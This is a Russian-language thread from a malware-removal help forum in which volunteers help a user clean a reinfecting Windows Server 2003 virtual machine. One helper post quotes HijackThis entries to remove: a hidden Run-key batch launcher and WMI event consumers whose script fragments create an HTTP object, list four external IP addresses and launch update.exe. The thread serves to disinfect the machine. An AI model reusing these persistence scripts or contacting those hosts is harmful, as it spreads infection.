Здравствуйте!
Пожалуйста помогите избавиться от вируса.
Здравствуйте!
Пожалуйста помогите избавиться от вируса.
Последний раз редактировалось thyrex; 20.10.2019 в 06:42.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) harkovaa, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте!
"Пофиксите" в HijackThis:
Перезагрузите компьютер вручную и сделайте повторные логи по правилам. (CollectionLog)Код:O4 - HKLM\..\Run: [BGClients] = C:\WINDOWS\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close();(2702 bytes) O25 - WMI Event: msupdate - CLASS_FIRST_TEST - Event="__InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", Set objShell = CreateObject("WScript.Shell")¶ objShell.Run "C:\WINDOWS\system32\update.exe"¶
Пофиксил.Сообщение от Sandor
Последний раз редактировалось harkovaa; 17.10.2019 в 09:09.
Вы не описали как внешне проявляется. Что сейчас с проблемой?
Сильно тормозит система. Постоянные оповещения антивируса об опасных объектах. При санировании Dr.Web CureIt! и Касперский VRT постоянно обнаруживаются вирусы, лечатся но после перезапуска появляются вновь, при сканировании с загрузочной флешки не нахотятся вирусы вообще. При попытке жесткого удаления прекращается отправка исходящих пакетов по сети.
Снимок экрана 2019-10-16 в 13.58.19.jpg
Это продолжается и сейчас?
Если да:
Скачайте Malwarebytes' Anti-Malware. Установите и запустите.
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
При попытке установки выдается такое диалоговое окно.
Ах, да, на 2003 эта версия не поставится.
Сделайте полный образ автозапуска uVS, только программу скачайте отсюда
- - - - -Добавлено - - - - -
p.s.
Вам необходимо лечить именно виртуальную машину? Вариант переустановить не рассматривается?
Сделал
Именно лечить. К сожалению переустановка не возможна по определенным причинам.
Последний раз редактировалось thyrex; 20.10.2019 в 06:43.
Вы собрали отчет Автологером, а я просил нечто другое.
Ваши права в разделе
Ответить с цитированием
